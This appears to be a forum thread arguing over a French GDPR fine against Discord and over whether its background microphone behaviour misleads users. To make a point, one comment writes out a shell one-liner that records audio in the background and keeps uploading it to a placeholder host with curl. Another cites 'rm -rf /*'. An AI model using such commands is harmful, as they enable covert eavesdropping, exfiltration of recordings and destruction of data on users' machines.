With all due respect 800.000 is a moderate amount looking at some awards in the consumer space in the US considering that we are looking here at a situation where eavesdropping on other people in the privacy of their homes is involved.
They could simply warn the company if they thought that would really be a problem. Fining 800k is ridiculous. If they can do this, they can attack anyone with a similar reasoning, which effectively turns GDPR into a weapon.
Yeah, 800k might not be much, but the ideology is the problem here, not the amount.
The amount of the fine is explained in the bulletin you are commenting upon:
"The amount of the fine was decided regarding the breaches identified, the number of people concerned, but also taking into account the efforts made by the company throughout the procedure to reach compliance and the fact that its business model is not based on the exploitation of personal data."
So evidently there was a dialog with the company during which they remedied much of the fault. Isn't that exactly the sort of approach you'd want from a regulator?
> It's just a "weapon" by the EU to attack any company they want. I'm pretty much sure if I made a hello world program in C, they'd find a clever way of fining me.
Not so. Your hello world in C be just fine. Only if you track data of users that happen to live in the EU. Don't track and you absolutely will not violate GDPR.
Discord broke the law in France and gets fined according the the laws in France.
The flagged issues could have been easily avoided by having a proper GDPR trained lawyer review the service and suggest changes.
I think GDPR being a weapon to attack companies is a good thing.
I've always thought that the bad aspect of GDPR is that it's General. We have in Slovenia a strict law about privacy and personal data protection. Companies with Slovene customers had to implement country specific notices and contracts, but GDPR made that easier. Especially for companies.
That's how I viewed it; as a legislation that allows companies to harvest user data easily and that's the main point why I was against it.
This comment sort of opened my mind a bit, now the same central legislation can also be used for the benefit of the people, since a legislation enforcement agency does not have to know so much regulation to defend user data. Though on the other hand, the GDPR is pretty long, much longer than slovenian law (we didn't implement GDPR yet, SI is currently paying fees for not implementing it).
Note: Big AFAIK -- law is really not something I understand, please correct me or add your opinion.
How are they even making things up here? If you read through the entire thing they have a very valid case against Discord, ranging from the UX being confusing (i.e. "data protection by default") to actually storing the data they are not allowed to (i.e. illegally).
If you operate in a jurisdiction you operate by that jurisdictions laws. Do you think European companies don't have to abide by US laws when operating in the US?
Developers are not above the law. Companies are definitely not above the law, considering that the law is an impediment to their functioning and not something they will fight for.
The reign of super-large companies is a threat to democracy, because a democracy is made for its citizens; a company is a tool and should remain under control of society. Why can companies decide how much taxes they pay ? Why can they decide where they pay them ? How can they be so powerful as to decide that breaking society's will is merely a fine, and is taken into account in the budget ? This is ridiculous. The companies are not citizens, they do not need to be cajoled.
>if I made a hello world program in C, they'd find a clever way of fining me
Last time I check Hello World do not contain any internet connection code, let me know an example of C hello world that grabs your microphone input then sends it over the internet. Probably would be a single Linux command line job.
nohup arecord /tmp/audio & ; nohup while :; do curl -F'data=/tmp/audio' http://example.com; done &
Untested pseudocode, but probably close - that's enough for a GDPR violation I guess? That it'd record unimpeded while running in the background, and sending the output elsewhere?
Pretty stupid scenario - sad Discord had locations in that area, because I agree with a lot of other posters, it seems to just be a weaponized law for monetary gain.
No, you would also need to run on computers of people not understanding what is going on.
In the same way as running
> rm -rf /*
on computers of people not understanding what is going on (or not agreeing to it) and where you are not allowed to do so is illegal, for quite good reasons.
Did the users choose to install the Discord app (or run a random command?)
How are you supposed to confirm "user understanding"?
Does the program need to require a tutorial/training before it's being used?
A user's ignorance shouldn't be a software distributor's problem.
If the discord app didn't have a system tray, and hid it's process from the Process List someway, maybe you have a point - this is just ignorance across the board.
I think if you are doing the close is actually not killing the app you should ensure the user is aware the app is still recording. Some apps will show a recoding thinggy ont he screen or it will tell you before closing and you need to agree.
I don't have the time to test this, but if is true that you close the app and it sill continue recording that this is bad UX and the company should have prioritize fixing this instead of adding even more crap. Maybe some good practices would come from this.
Doesn't it show a system tray icon? (I don't use discord on Windows, or a system tray myself) - is a system tray icon not adequate? I believe it would show 24/7 wouldn't it?
I am not sure, it won't be enough IMO if the icon in the Tray is not changing to a clear Recording icon.
It would be like on my phone the big red End Call button would not end the call, just minimize the app and put a small gray icon on the top-bar section.
